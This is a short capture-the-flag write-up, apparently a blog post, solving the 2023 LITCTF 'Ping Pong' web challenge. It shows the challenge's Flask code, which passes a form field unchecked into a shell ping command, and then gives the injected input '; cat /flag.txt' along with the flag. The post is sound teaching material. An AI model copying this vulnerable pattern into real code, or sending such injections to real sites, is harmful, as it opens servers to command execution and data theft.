Post

2023 LITCTF - Ping Pong

Posted
By thanguyen165 1 min read
  • 387 solves / 114 points
  • Author: Ethan

Description

I made this cool website where you can ping other websites!

Attached

pingpong.zip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

from flask import Flask, render_template, redirect, request
import os

app = Flask(__name__)

@app.route('/', methods = ['GET','POST'])
def index():
    output = None
    if request.method == 'POST':
        hostname = request.form['hostname']
        cmd = "ping -c 3 " + hostname
        output = os.popen(cmd).read()

    return render_template('index.html', output=output)

Analyzation

When receiving hostname from POST method, the command will be executed without checking data from hostname

1
2

cmd = "ping -c 3 " + hostname
output = os.popen(cmd).read()

This leads to command injection.

Solution

POST the hostname

1

; cat /flag.txt

The flag is

1

LITCTF{I_sh0uld_b3_m0r3_c4r3ful}
Write-ups, 2023_LITCTF
Web Exploitation OS command injection
This post is licensed under CC BY 4.0 by the author.